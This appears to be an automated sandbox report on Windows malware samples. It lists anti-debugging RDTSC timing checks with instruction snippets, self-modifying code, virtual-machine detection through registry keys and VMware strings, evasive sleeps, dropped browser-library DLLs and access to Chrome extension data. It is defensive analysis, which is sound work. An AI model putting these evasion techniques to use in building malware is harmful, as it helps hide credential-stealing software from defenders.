Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0188 second address: 4EA01A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7FDD3F186Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00C6B second address: 4F00CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDCFD229Fh 0x00000008 jmp 00007F7FDCFD22A8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7FDCFD229Ah 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CA9 second address: 4F00CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CB8 second address: 4F00CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CBE second address: 4F00CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 call 00007F7FDD3F1874h 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CE4 second address: 4F00D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov al, 33h 0x00000010 movsx edi, cx 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007F7FDCFD22A5h 0x0000001f pop eax 0x00000020 mov di, E3A4h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00DB7 second address: 4F00DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB050F second address: 4EB0513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0513 second address: 4EB0519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0519 second address: 4EB0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0537 second address: 4EB053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB053D second address: 4EB059D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7FDCFD22A8h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 jmp 00007F7FDCFD229Fh 0x00000017 popad 0x00000018 push FFFFFFFEh 0x0000001a jmp 00007F7FDCFD22A6h 0x0000001f push 53DF1293h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7FDCFD229Ch 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB059D second address: 4EB05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB05A3 second address: 4EB05A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB05A7 second address: 4EB05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 249ED28Bh 0x00000012 pushad 0x00000013 mov cx, C3E3h 0x00000017 pushad 0x00000018 mov ebx, ecx 0x0000001a pushfd 0x0000001b jmp 00007F7FDD3F1872h 0x00000020 sub eax, 42EF8428h 0x00000026 jmp 00007F7FDD3F186Bh 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e push 726A1579h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB05FB second address: 4EB0601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0601 second address: 4EB0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 15ED6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 15EE83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 15ED72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 306BC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 32B6B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: F7ED6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: F7EE83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: F7ED72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1126BC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 114B6B6 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Code function: 8_2_04F00D13 rdtsc 8_2_04F00D13
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3219 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2211 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1113 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1076 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 405 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1431 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1505 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Rnteb46TuM.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6532 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2876 Thread sleep count: 1113 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2876 Thread sleep time: -2227113s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5224 Thread sleep count: 1076 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5224 Thread sleep time: -2153076s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7064 Thread sleep count: 405 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7064 Thread sleep time: -12150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 416 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 Thread sleep count: 1431 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 Thread sleep time: -2863431s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7052 Thread sleep count: 1505 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7052 Thread sleep time: -3011505s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C7AC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000B.00000002.2400723434.0000000001107000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3033534217.0000000001107000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
